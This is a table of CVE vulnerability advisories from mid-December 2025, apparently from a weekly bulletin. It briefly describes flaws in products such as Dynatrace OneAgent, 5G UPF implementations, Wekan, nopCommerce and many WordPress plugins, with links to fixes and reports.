| OneAgent--OneAgent | An issue was discovered in Dynatrace OneAgent before 1.325.47. When attempting to access a remote network share from a machine where OneAgent is installed and receiving a "STATUS_LOGON_FAILURE" error, the agent will retrieve every user token on the machine and repeatedly attempt to access the network share while impersonating them. The exploitation of this vulnerability can allow an unprivileged attacker with access to the affected system to perform NTLM relay attacks. | 2025-12-15 | not yet calculated | CVE-2025-65176 | https://hackerone.com/reports/3313408 https://docs.dynatrace.com/docs/shortlink/release-notes-oneagent-sprint-325#oneagent-sprint-325-ga https://docs.dynatrace.com/docs/whats-new/oneagent/sprint-325#oneagent-sprint-325-ga |
| Entrinisik--Entrinisik | There is a username enumeration via local user login in Entrinsik Informer v5.10.1 which allows malicious users to enumerate users by entering an OTP code and new password then reviewing application responses. | 2025-12-17 | not yet calculated | CVE-2025-65185 | http://entrinsik.com http://informer.com https://www.triaxiomsecurity.com/entrinsik-informer-username-enumeration-cve-2025-65185/ |
| KeePassXC--KeePassXc | KeePassXC-Browser thru 1.9.9.2 autofills or prompts to fill stored credentials into documents rendered under a browser-enforced CSP directive and iframe attribute sandbox, allowing attacker-controlled script in the sandboxed document to access populated form fields and exfiltrate credentials. | 2025-12-17 | not yet calculated | CVE-2025-65203 | https://github.com/keepassxreboot/keepassxc-browser/issues/2647 https://github.com/keepassxreboot/keepassxc-browser/pull/2648 |
| MooreThreads--MooreThreads | MooreThreads torch_musa through all versions contains an unsafe deserialization vulnerability in torch_musa.utils.compare_tool. The compare_for_single_op() and nan_inf_track_for_single_op() functions use pickle.load() on user-controlled file paths without validation, allowing arbitrary code execution. An attacker can craft a malicious pickle file that executes arbitrary Python code when loaded, enabling remote code execution with the privileges of the victim process. | 2025-12-15 | not yet calculated | CVE-2025-65213 | https://github.com/MooreThreads/torch_musa/issues/110#issuecomment-3475809588 |
| SLiMS--SliMS | Reflected cross-site scripting (XSS) in SLiMS (slims9_bulian) before 9.6.0 via improper handling of $_SERVER['PHP_SELF' ] in index.php/sysconfig.inc.php, which allows remote attackers to execute arbitrary JavaScript in a victim's browser by supplying a crafted URL path. | 2025-12-17 | not yet calculated | CVE-2025-65233 | https://github.com/slims/slims9_bulian/issues/185 https://github.com/hbtw25/vulnerability-research/tree/main/CVE-2025-65233 |
| Canary Mail--Canary Mail | When using the attachment interaction functionality, Canary Mail 5.1.40 and below saves documents to a file system without a Mark-of-the-Web tag, which allows attackers to bypass the built-in file protection mechanisms of both Windows OS and third-party software. | 2025-12-16 | not yet calculated | CVE-2025-65318 | http://canary.com http://canarymail.com https://drive.google.com/file/d/14wrTzvcLPfFsWmy-SAtDwwZKKPssBsx5/view https://github.com/nickvourd/RTI-Toolkit https://github.com/bbaboha/CVE-2025-65318-and-CVE-2025-65319 |
| Blue Mail--Blue Mail | When using the attachment interaction functionality, Blue Mail 1.140.103 and below saves documents to a file system without a Mark-of-the-Web tag, which allows attackers to bypass the built-in file protection mechanisms of both Windows OS and third-party software. | 2025-12-16 | not yet calculated | CVE-2025-65319 | http://blue.com https://github.com/nickvourd/RTI-Toolkit https://github.com/rip1s/CVE-2017-11882 https://drive.google.com/file/d/1dVzXuHBk3B1DiFpwFYwj2NNjeKGnGSwT/view https://github.com/bbaboha/CVE-2025-65318-and-CVE-2025-65319 |
| Dbit--Dbit | An issue was discovered in Dbit N300 T1 Pro Easy Setup Wireless Wi-Fi Router on firmware version V1.0.0 does not implement rate limiting to /api/login allowing attackers to brute force password enumerations. | 2025-12-16 | not yet calculated | CVE-2025-65427 | http://shenzhen.com http://dbit.com https://github.com/kirubel-cve/CVE-2025-65427 |
| allauth-django --allauth-django | An issue was discovered in allauth-django before 65.13.0. IdP: marking a user as is_active=False after having handed tokens for that user while the account was still active had no effect. Fixed the access/refresh tokens are now rejected. | 2025-12-15 | not yet calculated | CVE-2025-65430 | https://allauth.org/news/2025/10/django-allauth-65.13.0-released/ |
| allauth-django--allauth-django | An issue was discovered in allauth-django before 65.13.0. Both Okta and NetIQ were using preferred_username as the identifier for third-party provider accounts. That value may be mutable and should therefore be avoided for authorization decisions. The providers are now using sub instead. | 2025-12-15 | not yet calculated | CVE-2025-65431 | https://allauth.org/news/2025/10/django-allauth-65.13.0-released/ |
| Open5GS--Open5GS | An issue was discovered in Open5GS 2.7.5-49-g465e90f, when processing a PFCP Session Establishment Request (type=50), the UPF crashes with a reachable assertion in `lib/pfcp/context.c` (`ogs_pfcp_object_teid_hash_set`) if the CreatePDR?PDI?F-TEID has CH=1 and the F-TEID address-family flag(s) (IPv4/IPv6) do not match the GTP-U resource family configured for the selected DNN (Network Instance), resulting in a denial of service. | 2025-12-18 | not yet calculated | CVE-2025-65559 | https://github.com/open5gs/open5gs/issues/4135 |
| LocalNode.Sess--LocalNode.Sess | An issue was discovered in function LocalNode.Sess in free5GC 4.1.0 allowing attackers to cause a denial of service or other unspecified impacts via crafted header Local SEID to the PFCP Session Modification Request. | 2025-12-18 | not yet calculated | CVE-2025-65561 | https://github.com/free5gc/free5gc/issues/730 https://github.com/free5gc/go-upf/pull/80 |
| Fre5GC--Free5GC | The free5GC UPF suffers from a lack of bounds checking on the SEID when processing PFCP Session Deletion Requests. An unauthenticated remote attacker can send a request with a very large SEID (e.g., 0xFFFFFFFFFFFFFFFF) that causes an integer conversion/underflow in LocalNode.DeleteSess() / LocalNode.Sess() when a uint64 SEID is converted to int and used in index arithmetic. This leads to a negative index into n.sess and a Go runtime panic, resulting in a denial of service (UPF crash). The issue has been reproduced on free5GC v4.1.0 with crashes observed in the session lookup/deletion path in internal/pfcp/node.go; other versions may also be affected. No authentication is required. | 2025-12-18 | not yet calculated | CVE-2025-65562 | https://github.com/free5gc/free5gc/issues/731 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-project UPF (component upf-epc/pfcpiface) up to at least version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Association Setup Request that is missing the mandatory NodeID Information Element, the association setup handler dereferences a nil pointer instead of validating the message, causing a panic and terminating the UPF process. An attacker who can send PFCP Association Setup Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services. | 2025-12-18 | not yet calculated | CVE-2025-65563 | https://github.com/omec-project/upf/issues/955 https://github.com/omec-project/upf/pull/963 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-upf (upf-epc-pfcpiface) in version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Association Setup Request that is missing the mandatory Recovery Time Stamp Information Element, the association setup handler dereferences a nil pointer via IE.RecoveryTimeStamp() instead of validating the message. This results in a panic and terminates the UPF process. An attacker who can send PFCP Association Setup Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services. | 2025-12-18 | not yet calculated | CVE-2025-65564 | https://github.com/omec-project/upf/issues/956 https://github.com/omec-project/upf/pull/964 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association is established, a PFCP Session Establishment Request that is missing the mandatory F-SEID (CPF-SEID) Information Element is not properly validated. The session establishment handler calls IE.FSEID() on a nil pointer, which triggers a panic and terminates the UPF process. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services. | 2025-12-18 | not yet calculated | CVE-2025-65565 | https://github.com/omec-project/upf/issues/957 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Session Report Response that is missing the mandatory Cause Information Element, the session report handler dereferences a nil pointer instead of rejecting the malformed message. This triggers a panic and terminates the UPF process. An attacker who can send PFCP Session Report Response messages to the UPF's N4/PFCP endpoint can exploit this flaw to repeatedly crash the UPF and disrupt user-plane services. | 2025-12-18 | not yet calculated | CVE-2025-65566 | https://github.com/omec-project/upf/issues/958 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association, a specially crafted PFCP Session Establishment Request with a CreatePDR that contains a malformed Flow-Description is not robustly validated. The Flow-Description parser (parseFlowDesc) can read beyond the bounds of the provided buffer, causing a panic and terminating the UPF process. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF. | 2025-12-18 | not yet calculated | CVE-2025-65567 | https://github.com/omec-project/upf/issues/959 |
| omec-project--omec-project | A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association, a PFCP Session Establishment Request that includes a CreateFAR with an empty or truncated IPv4 address field is not properly validated. During parsing, parseFAR() calls ip2int(), which performs an out-of-bounds read on the IPv4 address buffer and triggers an index-out-of-range panic. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services. | 2025-12-18 | not yet calculated | CVE-2025-65568 | http://omec-projectupf.com http://upf-epc-pfcpiface.com https://github.com/omec-project/upf/issues/962 |
| Volosoft--Volosoft | An open redirect vulnerability exists in the Account module in Volosoft ABP Framework >= 5.1.0 and < 10.0.0-rc.2. Improper validation of the returnUrl parameter in the register function allows an attacker to redirect users to arbitrary external domains. | 2025-12-16 | not yet calculated | CVE-2025-65581 | https://github.com/abpframework/abp/commit/a01adc58464d278ca817c4bbb6cbce30f155d0d1 https://github.com/abpframework/abp/commit/44a2dc14e933f3ce1ca93f9313d836694ab77d1d |
| nopCommerce--nopCommerce | nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) via the Attributes functionality. | 2025-12-16 | not yet calculated | CVE-2025-65589 | https://www.nopcommerce.com/ https://seclists.org/fulldisclosure/2025/Dec/16 |
| nopCommerce--nopCommerce | nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) via the Blog posts functionality in the Content Management area. | 2025-12-16 | not yet calculated | CVE-2025-65590 | https://www.nopcommerce.com/ https://seclists.org/fulldisclosure/2025/Dec/17 |
| nopCommerce--nopCommerce | nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) via the Currencies functionality. | 2025-12-16 | not yet calculated | CVE-2025-65591 | https://www.nopcommerce.com/ https://seclists.org/fulldisclosure/2025/Dec/18 |
| nopCommerce--nopCommerce | nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) in the product management functionality. Malicious payloads inserted into the "Product Name" and "Short Description" fields are stored in the backend database and executed automatically whenever a user views the affected pages. | 2025-12-16 | not yet calculated | CVE-2025-65592 | https://www.nopcommerce.com/ https://seclists.org/fulldisclosure/2025/Dec/19 |
| nopCommerce--nopCommerce | nopCommerce 4.90.0 is vulnerable to Cross Site Request Forgery (CSRF) via the Schedule Tasks functionality. | 2025-12-16 | not yet calculated | CVE-2025-65593 | https://www.nopcommerce.com/ https://seclists.org/fulldisclosure/2025/Dec/20 |
| OmniDocs--OmniDocs | An unauthenticated Broken Function Level Authorization (BFLA) vulnerability in Newgen OmniDocs v11.0 allows attackers to obtain sensitive information and execute a full account takeover via a crafted API request. | 2025-12-15 | not yet calculated | CVE-2025-65742 | https://newgensoft.com/ https://github.com/CBx216/CVE-2025-65742-Newgen-OmniDocs-LDAP-BFLA/blob/main/CVE-2025-65742.md |
| Wekan--Wekan | An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Uploaded attachments can be served with attacker-controlled Content-Type (text/html), allowing execution of attacker-supplied HTML/JS in the application's origin and enabling session/token theft and CSRF actions. | 2025-12-15 | not yet calculated | CVE-2025-65778 | https://github.com/wekan/wekan https://wekan.fi/hall-of-fame/spacebleed/ https://github.com/wekan/wekan/commit/e9a727301d7b4f1689a703503df668c0f4f4cab8 https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release |
| Wekan--Wekan | An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Unauthenticated attackers can update a board's "sort" value (Boards.allow returns true without verifying userId), allowing arbitrary reordering of boards. | 2025-12-15 | not yet calculated | CVE-2025-65779 | https://github.com/wekan/wekan https://wekan.fi/hall-of-fame/spacebleed/ https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release https://github.com/wekan/wekan/commit/ea310d7508b344512e5de0dfbc9bdfd38145c5c5 |
| Wekan--Wekan | An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authenticated users can update their entire user document (beyond profile fields), including orgs/teams and loginDisabled, due to missing server-side authorization checks; this enables privilege escalation and unauthorized access to other teams/orgs. | 2025-12-15 | not yet calculated | CVE-2025-65780 | https://github.com/wekan/wekan https://wekan.fi/hall-of-fame/spacebleed/ https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release https://github.com/wekan/wekan/commit/f26d58201855e861bab1cd1fda4d62c664efdb81 |
| Wekan--Wekan | An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Attachment upload API treats the Authorization bearer value as a userId and enters a non-terminating body-handling branch for any non-empty bearer token, enabling trivial application-layer DoS and latent identity-spoofing. | 2025-12-15 | not yet calculated | CVE-2025-65781 | https://github.com/wekan/wekan https://wekan.fi/hall-of-fame/spacebleed/ https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release https://github.com/wekan/wekan/commit/ccd90343394f433b287733ad0a33c08e0a71f53c |
| Wekan--Wekan | An issue was discovered in Wekan The Open Source kanban board system up to version 18.15, fixed in 18.16. Authorization flaw in card update handling allows board members (and potentially other authenticated users) to add/remove arbitrary user IDs in vote.positive / vote.negative arrays, enabling vote forgery and unauthorized voting. | 2025-12-15 | not yet calculated | CVE-2025-65782 | https://github.com/wekan/wekan https://wekan.fi/hall-of-fame/spacebleed/ https://github.com/wekan/wekan/blob/main/CHANGELOG.md#v816-2025-11-02-wekan--release https://github.com/wekan/wekan/commit/0a1a075f3153e71d9a858576f1c68d2925230d9c |
| Meltytech--Melytech | Meltytech Shotcut 25.10.31 is vulnerable to Buffer Overflow. A memory access violation occurs when processing MLT project files with manipulated width and height parameters. By setting these values to extremely large numbers, the application attempts to allocate excessive memory during image processing, triggering a buffer overflow in the mlt_image_fill_white function. | 2025-12-16 | not yet calculated | CVE-2025-65834 | https://sourceforge.net/projects/shotcut/files/v25.10.31/shotcut-macos-25.10.31.dmg/download https://bytescan.net/CVE/cve-2025-65834.html |
| Cordova--Cordova | The Cordova plugin cordova-plugin-x-socialsharing (SocialSharing-PhoneGap-Plugin) for Android 6.0.4, registers an exported broadcast receiver nl.xservices.plugins.ShareChooserPendingIntent with an android.intent.action.SEND intent filter. The onReceive implementation accesses Intent.EXTRA_CHOSEN_COMPONENT without checking for null. If a broadcast is sent with extras present but without EXTRA_CHOSEN_COMPONENT, the code dereferences a null value and throws a NullPointerException. Because the receiver is exported and performs no permission or caller validation, any local application on the device can send crafted ACTION_SEND broadcasts to this component and repeatedly crash the host application, resulting in a local, unauthenticated application-level denial of service for any app that includes the plugin. | 2025-12-15 | not yet calculated | CVE-2025-65835 | https://github.com/EddyVerbruggen/SocialSharing-PhoneGap-Plugin https://www.npmjs.com/package/cordova-plugin-x-socialsharing https://medium.com/@lcrawfqrd/local-dos-via-exported-receivers-f6b1da10d3b7 |
| Netun--Netun | The OTA firmware update mechanism in Netun Solutions HelpFlash IoT (firmware v18_178_221102_ASCII_PRO_1R5_50) uses hard-coded WiFi credentials identical across all devices and does not authenticate update servers or validate firmware signatures. An attacker with brief physical access can activate OTA mode (8-second button press), create a malicious WiFi AP using the known credentials, and serve malicious firmware via unauthenticated HTTP to achieve arbitrary code execution on this safety-critical emergency signaling device. | 2025-12-17 | not yet calculated | CVE-2025-65855 | https://docs.espressif.com/projects/esp-idf/en/v4.3.2/ https://luismirandaacebedo.github.io/CVE-2025-65855/ |
| ThimPress--LearnPress | Missing Authorization vulnerability in ThimPress LearnPress learnpress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LearnPress: from n/a through <= 4.2.9.4. | 2025-12-18 | not yet calculated | CVE-2025-66054 | https://vdp.patchstack.com/database/Wordpress/Plugin/learnpress/vulnerability/wordpress-learnpress-plugin-4-2-9-4-broken-access-control-vulnerability?_s_id=cve |
| InstaWP--InstaWP Connect | Missing Authorization vulnerability in InstaWP InstaWP Connect instawp-connect allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects InstaWP Connect: from n/a through <= 0.1.1.9. | 2025-12-18 | not yet calculated | CVE-2025-66068 | https://vdp.patchstack.com/database/Wordpress/Plugin/instawp-connect/vulnerability/wordpress-instawp-connect-plugin-0-1-1-9-broken-access-control-vulnerability?_s_id=cve |
| Tomdever--wpForo Forum | Missing Authorization vulnerability in Tomdever wpForo Forum wpforo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpForo Forum: from n/a through <= 2.4.10. | 2025-12-18 | not yet calculated | CVE-2025-66070 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpforo/vulnerability/wordpress-wpforo-forum-plugin-2-4-10-broken-access-control-vulnerability?_s_id=cve |
| Cozmoslabs--WP Webhooks | Unrestricted Upload of File with Dangerous Type vulnerability in Cozmoslabs WP Webhooks wp-webhooks allows Path Traversal.This issue affects WP Webhooks: from n/a through <= 3.3.8. | 2025-12-18 | not yet calculated | CVE-2025-66074 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-webhooks/vulnerability/wordpress-wp-webhooks-plugin-3-3-8-arbitrary-file-upload-vulnerability?_s_id=cve |
| jetmonsters--Hotel Booking Lite | Improper Control of Generation of Code ('Code Injection') vulnerability in jetmonsters Hotel Booking Lite motopress-hotel-booking-lite allows Remote Code Inclusion.This issue affects Hotel Booking Lite: from n/a through <= 5.2.3. | 2025-12-18 | not yet calculated | CVE-2025-66078 | https://vdp.patchstack.com/database/Wordpress/Plugin/motopress-hotel-booking-lite/vulnerability/wordpress-hotel-booking-lite-plugin-5-2-3-remote-code-execution-rce-vulnerability?_s_id=cve |
| Property Hive--PropertyHive | Missing Authorization vulnerability in Property Hive PropertyHive propertyhive allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PropertyHive: from n/a through <= 2.1.12. | 2025-12-18 | not yet calculated | CVE-2025-66088 | https://vdp.patchstack.com/database/Wordpress/Plugin/propertyhive/vulnerability/wordpress-propertyhive-plugin-2-1-12-broken-access-control-vulnerability-2?_s_id=cve |
| Magnigenie--RestroPress | Missing Authorization vulnerability in Magnigenie RestroPress restropress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RestroPress: from n/a through <= 3.2.3.5. | 2025-12-18 | not yet calculated | CVE-2025-66100 | https://vdp.patchstack.com/database/Wordpress/Plugin/restropress/vulnerability/wordpress-restropress-plugin-3-2-3-5-broken-access-control-vulnerability?_s_id=cve |
| FolioVision--FV Antispam | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FolioVision FV Antispam fv-antispam allows Reflected XSS.This issue affects FV Antispam: from n/a through <= 2.7. | 2025-12-18 | not yet calculated | CVE-2025-66102 | https://vdp.patchstack.com/database/Wordpress/Plugin/fv-antispam/vulnerability/wordpress-fv-antispam-plugin-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Anton Vanyukov--Offload, AI & Optimize with Cloudflare Images | Missing Authorization vulnerability in Anton Vanyukov Offload, AI & Optimize with Cloudflare Images cf-images allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Offload, AI & Optimize with Cloudflare Images: from n/a through <= 1.9.5. | 2025-12-18 | not yet calculated | CVE-2025-66104 | https://vdp.patchstack.com/database/Wordpress/Plugin/cf-images/vulnerability/wordpress-offload-ai-optimize-with-cloudflare-images-plugin-1-9-5-broken-access-control-vulnerability?_s_id=cve |
| UserElements--Ultimate Member Widgets for Elementor | Insertion of Sensitive Information Into Sent Data vulnerability in UserElements Ultimate Member Widgets for Elementor ultimate-member-widgets-for-elementor allows Retrieve Embedded Sensitive Data.This issue affects Ultimate Member Widgets for Elementor: from n/a through <= 2.3. | 2025-12-18 | not yet calculated | CVE-2025-66116 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-member-widgets-for-elementor/vulnerability/wordpress-ultimate-member-widgets-for-elementor-plugin-2-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Ays Pro--Easy Form | Missing Authorization vulnerability in Ays Pro Easy Form easy-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Form: from n/a through <= 2.7.8. | 2025-12-18 | not yet calculated | CVE-2025-66117 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-form/vulnerability/wordpress-easy-form-plugin-2-7-8-broken-access-control-vulnerability?_s_id=cve |
| BoldGrid--Sprout Clients | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldGrid Sprout Clients sprout-clients allows Reflected XSS.This issue affects Sprout Clients: from n/a through <= 3.2.1. | 2025-12-18 | not yet calculated | CVE-2025-66118 | https://vdp.patchstack.com/database/Wordpress/Plugin/sprout-clients/vulnerability/wordpress-sprout-clients-plugin-3-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Bob--Hostel | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bob Hostel hostel allows Reflected XSS.This issue affects Hostel: from n/a through <= 1.1.5.9. | 2025-12-18 | not yet calculated | CVE-2025-66119 | https://vdp.patchstack.com/database/Wordpress/Plugin/hostel/vulnerability/wordpress-hostel-plugin-1-1-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CatFolders--CatFolders | Missing Authorization vulnerability in CatFolders CatFolders catfolders allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CatFolders: from n/a through <= 2.5.3. | 2025-12-16 | not yet calculated | CVE-2025-66120 | https://vdp.patchstack.com/database/Wordpress/Plugin/catfolders/vulnerability/wordpress-catfolders-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve |
| SiteGround--SiteGround Security | Missing Authorization vulnerability in SiteGround SiteGround Security sg-security allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SiteGround Security: from n/a through <= 1.5.8. | 2025-12-16 | not yet calculated | CVE-2025-66121 | https://vdp.patchstack.com/database/Wordpress/Plugin/sg-security/vulnerability/wordpress-siteground-security-plugin-1-5-8-broken-access-control-vulnerability?_s_id=cve |
| Design--Stylish Price List | Missing Authorization vulnerability in Design Stylish Price List stylish-price-list allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Stylish Price List: from n/a through <= 7.2.2. | 2025-12-16 | not yet calculated | CVE-2025-66122 | https://vdp.patchstack.com/database/Wordpress/Plugin/stylish-price-list/vulnerability/wordpress-stylish-price-list-plugin-7-2-2-broken-access-control-vulnerability?_s_id=cve |
| ZEEN101--Leaky Paywall | Missing Authorization vulnerability in ZEEN101 Leaky Paywall leaky-paywall allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Leaky Paywall: from n/a through <= 4.22.5. | 2025-12-16 | not yet calculated | CVE-2025-66124 | https://vdp.patchstack.com/database/Wordpress/Plugin/leaky-paywall/vulnerability/wordpress-leaky-paywall-plugin-4-22-5-broken-access-control-vulnerability?_s_id=cve |
| Nitesh--Ultimate Auction | Insertion of Sensitive Information Into Sent Data vulnerability in Nitesh Ultimate Auction ultimate-auction allows Retrieve Embedded Sensitive Data.This issue affects Ultimate Auction : from n/a through <= 4.3.2. | 2025-12-16 | not yet calculated | CVE-2025-66125 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-auction/vulnerability/wordpress-ultimate-auction-plugin-4-3-2-sensitive-data-exposure-vulnerability?_s_id=cve |
| wowpress.host--Fix Media Library | Insertion of Sensitive Information Into Sent Data vulnerability in wowpress.host Fix Media Library wow-media-library-fix allows Retrieve Embedded Sensitive Data.This issue affects Fix Media Library: from n/a through <= 2.0. | 2025-12-16 | not yet calculated | CVE-2025-66126 | https://vdp.patchstack.com/database/Wordpress/Plugin/wow-media-library-fix/vulnerability/wordpress-fix-media-library-plugin-2-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| g5theme--Essential Real Estate | Missing Authorization vulnerability in g5theme Essential Real Estate essential-real-estate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Essential Real Estate: from n/a through <= 5.2.2. | 2025-12-16 | not yet calculated | CVE-2025-66127 | https://vdp.patchstack.com/database/Wordpress/Plugin/essential-real-estate/vulnerability/wordpress-essential-real-estate-plugin-5-2-2-broken-access-control-vulnerability?_s_id=cve |
| Brevo--Sendinblue for WooCommerce | Missing Authorization vulnerability in Brevo Sendinblue for WooCommerce woocommerce-sendinblue-newsletter-subscription allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sendinblue for WooCommerce: from n/a through <= 4.0.49. | 2025-12-16 | not yet calculated | CVE-2025-66128 | https://vdp.patchstack.com/database/Wordpress/Plugin/woocommerce-sendinblue-newsletter-subscription/vulnerability/wordpress-sendinblue-for-woocommerce-plugin-4-0-49-broken-access-control-vulnerability?_s_id=cve |
| wppochipp--Pochipp | Missing Authorization vulnerability in wppochipp Pochipp pochipp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pochipp: from n/a through <= 1.18.0. | 2025-12-16 | not yet calculated | CVE-2025-66129 | https://vdp.patchstack.com/database/Wordpress/Plugin/pochipp/vulnerability/wordpress-pochipp-plugin-1-18-0-broken-access-control-vulnerability?_s_id=cve |
| etruel--WP Views Counter | Missing Authorization vulnerability in etruel WP Views Counter wpecounter allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Views Counter: from n/a through <= 2.1.2. | 2025-12-16 | not yet calculated | CVE-2025-66130 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpecounter/vulnerability/wordpress-wp-views-counter-plugin-2-1-2-broken-access-control-vulnerability?_s_id=cve |
| yaadsarig--Yaad Sarig Payment Gateway For WC | Missing Authorization vulnerability in yaadsarig Yaad Sarig Payment Gateway For WC yaad-sarig-payment-gateway-for-wc allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Yaad Sarig Payment Gateway For WC: from n/a through <= 2.2.10. | 2025-12-16 | not yet calculated | CVE-2025-66131 | https://vdp.patchstack.com/database/Wordpress/Plugin/yaad-sarig-payment-gateway-for-wc/vulnerability/wordpress-yaad-sarig-payment-gateway-for-wc-plugin-2-2-10-broken-access-control-vulnerability?_s_id=cve |
| FAPI Business s.r.o.--FAPI Member | Authorization Bypass Through User-Controlled Key vulnerability in FAPI Business s.r.o. FAPI Member fapi-member allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FAPI Member: from n/a through <= 2.2.26. | 2025-12-16 | not yet calculated | CVE-2025-66132 | https://vdp.patchstack.com/database/Wordpress/Plugin/fapi-member/vulnerability/wordpress-fapi-member-plugin-2-2-26-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| WP Legal Pages--WP Cookie Notice for GDPR, CCPA & ePrivacy Consent | Missing Authorization vulnerability in WP Legal Pages WP Cookie Notice for GDPR, CCPA & ePrivacy Consent gdpr-cookie-consent allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Cookie Notice for GDPR, CCPA & ePrivacy Consent: from n/a through <= 4.0.7. | 2025-12-16 | not yet calculated | CVE-2025-66133 | https://vdp.patchstack.com/database/Wordpress/Plugin/gdpr-cookie-consent/vulnerability/wordpress-wp-cookie-notice-for-gdpr-ccpa-eprivacy-consent-plugin-4-0-7-broken-access-control-vulnerability?_s_id=cve |
| NinjaTeam--FileBird Pro | Missing Authorization vulnerability in NinjaTeam FileBird Pro filebird-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FileBird Pro: from n/a through <= 6.4.9. | 2025-12-16 | not yet calculated | CVE-2025-66134 | https://vdp.patchstack.com/database/Wordpress/Plugin/filebird-pro/vulnerability/wordpress-filebird-pro-plugin-6-4-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Coder for Elementor | Missing Authorization vulnerability in merkulove Coder for Elementor coder-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Coder for Elementor: from n/a through <= 1.0.13. | 2025-12-16 | not yet calculated | CVE-2025-66147 | https://vdp.patchstack.com/database/Wordpress/Plugin/coder-elementor/vulnerability/wordpress-coder-for-elementor-plugin-1-0-13-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Grider for Elementor | Missing Authorization vulnerability in merkulove Grider for Elementor grider-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Grider for Elementor: from n/a through <= 1.0.8. | 2025-12-16 | not yet calculated | CVE-2025-66161 | https://vdp.patchstack.com/database/Wordpress/Plugin/grider-elementor/vulnerability/wordpress-grider-for-elementor-plugin-1-0-8-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Spoter for Elementor | Missing Authorization vulnerability in merkulove Spoter for Elementor spoter-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Spoter for Elementor: from n/a through <= 1.04. | 2025-12-16 | not yet calculated | CVE-2025-66162 | https://vdp.patchstack.com/database/Wordpress/Plugin/spoter-elementor/vulnerability/wordpress-spoter-for-elementor-plugin-1-04-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Masker for Elementor | Missing Authorization vulnerability in merkulove Masker for Elementor masker-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Masker for Elementor: from n/a through <= 1.1.4. | 2025-12-16 | not yet calculated | CVE-2025-66163 | https://vdp.patchstack.com/database/Wordpress/Plugin/masker-elementor/vulnerability/wordpress-masker-for-elementor-plugin-1-1-4-broken-access-control-vulnerability?_s_id=cve |
